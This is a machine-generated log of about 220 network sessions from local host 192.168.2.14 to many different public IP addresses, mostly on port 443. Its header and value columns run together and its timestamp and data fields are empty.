                                      22752192.168.2.143405880.175.96.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22753192.168.2.1457596209.230.83.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22754192.168.2.1456170106.137.90.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22755192.168.2.1442830208.183.183.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22756192.168.2.1442584176.192.100.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22757192.168.2.1451964118.82.96.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22758192.168.2.144067082.91.28.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22759192.168.2.1435614191.206.83.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22760192.168.2.144776077.163.3.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22761192.168.2.143668225.48.104.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22762192.168.2.1436000106.213.137.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22763192.168.2.1455916188.110.135.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22764192.168.2.1443076112.181.4.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22765192.168.2.144682638.166.131.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22766192.168.2.1446630163.233.191.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22767192.168.2.1435196112.115.17.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22768192.168.2.143958842.87.11.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22769192.168.2.145286870.161.232.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22770192.168.2.1436234116.26.181.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22771192.168.2.144218686.214.34.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22772192.168.2.1434946195.19.225.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22773192.168.2.1442982161.181.19.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22774192.168.2.1454240181.162.31.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22775192.168.2.1451814172.76.29.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22776192.168.2.1443986100.213.43.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22777192.168.2.143660251.122.157.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22778192.168.2.145526685.220.71.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22779192.168.2.145407883.50.106.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22780192.168.2.145831832.154.39.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22781192.168.2.1451008216.45.85.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22782192.168.2.1444692189.253.176.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22783192.168.2.1445224121.74.50.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22784192.168.2.144363091.172.89.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22785192.168.2.146072427.102.164.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22786192.168.2.144038827.182.235.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22787192.168.2.143873485.37.244.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22788192.168.2.143856224.198.138.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22789192.168.2.145778271.244.19.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22790192.168.2.143527825.171.190.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22791192.168.2.1456200116.143.244.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22792192.168.2.144437087.98.161.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22793192.168.2.144796219.210.198.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22794192.168.2.1449516103.130.243.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22795192.168.2.1442826175.202.174.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22796192.168.2.1451182193.52.194.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22797192.168.2.1459330112.235.17.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22798192.168.2.1454588221.6.150.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22799192.168.2.144550424.32.113.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22800192.168.2.144099237.157.84.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22801192.168.2.1447334140.76.206.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22802192.168.2.145482225.71.192.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22803192.168.2.1448760110.190.72.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22804192.168.2.146047846.206.27.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22805192.168.2.144044499.240.149.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22806192.168.2.144400462.128.195.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22807192.168.2.1440774176.95.11.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22808192.168.2.1440794118.208.111.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22809192.168.2.1436286115.210.25.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22810192.168.2.1459092118.157.108.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22811192.168.2.1434744206.120.118.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22812192.168.2.143711253.121.159.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22813192.168.2.145365217.12.183.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22814192.168.2.143408844.77.127.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22815192.168.2.145562885.237.165.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22816192.168.2.1437630179.187.88.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22817192.168.2.1434482101.122.10.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22818192.168.2.1448266113.194.246.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22819192.168.2.14585524.93.2.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22820192.168.2.1445224158.209.198.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22821192.168.2.144461871.221.14.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22822192.168.2.1450622187.102.148.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22823192.168.2.1442300136.79.10.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22824192.168.2.1444772194.92.39.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22825192.168.2.1453320125.36.33.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22826192.168.2.1438672184.161.105.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22827192.168.2.143572844.89.248.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22828192.168.2.145314848.189.106.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22829192.168.2.1452840182.187.85.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22830192.168.2.1460992111.160.238.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22831192.168.2.14567802.117.174.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22832192.168.2.1450180109.39.71.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22833192.168.2.14453724.137.40.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22834192.168.2.14567441.177.126.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22835192.168.2.1439476157.138.51.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22836192.168.2.1452464113.101.20.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22837192.168.2.145923263.43.225.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22838192.168.2.143371692.226.161.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22839192.168.2.144244432.132.48.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22840192.168.2.144390090.76.47.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22841192.168.2.1435616104.198.221.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22842192.168.2.1438942196.121.170.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22843192.168.2.1451254132.166.168.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22844192.168.2.145676217.153.47.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22845192.168.2.144846470.61.126.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22846192.168.2.1440578165.79.243.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22847192.168.2.145315092.106.126.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22848192.168.2.144685676.1.72.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22849192.168.2.1455698134.210.188.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22850192.168.2.1455360149.46.184.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22851192.168.2.1432936169.228.65.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22852192.168.2.1455224139.127.31.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22853192.168.2.1445226160.173.10.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22854192.168.2.144440678.20.31.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22855192.168.2.145813878.100.57.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22856192.168.2.1447694187.227.39.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22857192.168.2.144064244.66.228.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22858192.168.2.1442056212.232.117.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22859192.168.2.1460712208.255.163.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22860192.168.2.1441114126.128.43.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22861192.168.2.145206237.165.154.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22862192.168.2.1453750211.222.211.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22863192.168.2.1447524175.17.145.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22864192.168.2.1445522196.27.81.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22865192.168.2.1445358105.131.138.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22866192.168.2.1441276106.126.121.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22867192.168.2.1451294146.88.183.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22868192.168.2.1460810223.66.178.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22869192.168.2.143745086.132.212.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22870192.168.2.145791670.66.165.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22871192.168.2.145571046.168.219.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22872192.168.2.1444876184.193.179.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22873192.168.2.1437860188.28.255.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22874192.168.2.1434264181.58.94.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22875192.168.2.1446296205.182.85.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22876192.168.2.1451878116.223.118.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22877192.168.2.1452952206.249.111.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22878192.168.2.1441354148.220.14.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22879192.168.2.1457490162.37.56.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22880192.168.2.145636666.114.149.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22881192.168.2.144448848.192.92.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22882192.168.2.1449804170.2.235.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22883192.168.2.146006263.128.87.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22884192.168.2.1434666140.28.251.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22885192.168.2.145287458.164.21.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22886192.168.2.1447302150.48.246.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22887192.168.2.145958076.52.181.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22888192.168.2.1439584112.2.172.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22889192.168.2.1442610136.35.149.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22890192.168.2.1446346173.240.68.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22891192.168.2.143681836.136.2.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22892192.168.2.1441516153.44.40.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22893192.168.2.1456280137.16.28.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22894192.168.2.1439690152.234.198.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22895192.168.2.143324031.34.21.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22896192.168.2.1434720154.43.51.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22897192.168.2.1434176163.92.78.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22898192.168.2.145355684.176.9.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22899192.168.2.1452798209.120.112.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22900192.168.2.145450643.143.174.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22901192.168.2.1443350162.65.23.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22902192.168.2.143840077.210.79.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22903192.168.2.144650088.1.179.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22904192.168.2.1460482119.123.148.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22905192.168.2.1446876134.188.212.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22906192.168.2.1458560136.152.7.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22907192.168.2.1444198115.244.197.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22908192.168.2.1433472204.31.189.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22909192.168.2.1456788129.95.216.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22910192.168.2.1442492105.227.250.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22911192.168.2.144842452.44.131.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22912192.168.2.145198887.41.203.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22913192.168.2.143707070.32.77.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22914192.168.2.1445552137.104.60.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22915192.168.2.144699217.249.179.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22916192.168.2.1443970210.209.249.658080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22917192.168.2.1444224173.208.43.2138080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22918192.168.2.1443972166.63.5.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22919192.168.2.145817896.137.184.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22920192.168.2.144510649.217.83.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22921192.168.2.1449820155.38.8.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22922192.168.2.1460194177.159.103.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22923192.168.2.1460952123.232.86.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22924192.168.2.1434944172.168.38.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22925192.168.2.145825060.170.139.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22926192.168.2.144889653.69.171.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22927192.168.2.1454552213.156.59.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22928192.168.2.1445696105.247.181.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22929192.168.2.1433940123.129.236.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22930192.168.2.143533272.184.177.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22931192.168.2.1436434198.156.187.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22932192.168.2.1454964205.88.67.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22933192.168.2.14597928.5.6.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22934192.168.2.1440486181.54.51.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22935192.168.2.1460692139.38.228.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22936192.168.2.144125417.75.112.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22937192.168.2.1456804120.150.200.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22938192.168.2.1438046114.117.209.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22939192.168.2.145951077.97.21.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22940192.168.2.1449368173.1.12.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22941192.168.2.1441450145.53.208.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22942192.168.2.1445074191.101.24.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22943192.168.2.1453758143.222.2.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22944192.168.2.1438052114.144.205.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22945192.168.2.1436074129.236.44.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22946192.168.2.1443132154.35.128.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22947192.168.2.1452348121.255.217.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22948192.168.2.1445418191.92.113.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22949192.168.2.1436350222.175.137.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22950192.168.2.1435036202.172.117.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22951192.168.2.1453638203.40.61.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22952192.168.2.1434920149.188.244.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22953192.168.2.14562888.147.65.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22954192.168.2.1455918104.224.86.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22955192.168.2.1441542201.57.118.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22956192.168.2.1434120108.93.213.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22957192.168.2.1457374125.41.54.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22958192.168.2.1455422164.195.218.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22959192.168.2.1459646151.198.13.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22960192.168.2.144257075.146.217.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22961192.168.2.1438854118.192.57.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22962192.168.2.14490045.37.153.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22963192.168.2.145982625.228.243.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22964192.168.2.1452312146.116.242.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22965192.168.2.143812643.202.93.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22966192.168.2.1457524186.197.186.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22967192.168.2.144634231.192.145.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22968192.168.2.1454512145.239.69.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22969192.168.2.1434986172.69.217.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22970192.168.2.1435358189.101.97.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22971192.168.2.1448084145.166.54.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22972192.168.2.144012234.193.196.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22973192.168.2.144779469.191.117.188443
                                      TimestampBytes transferredDirectionData


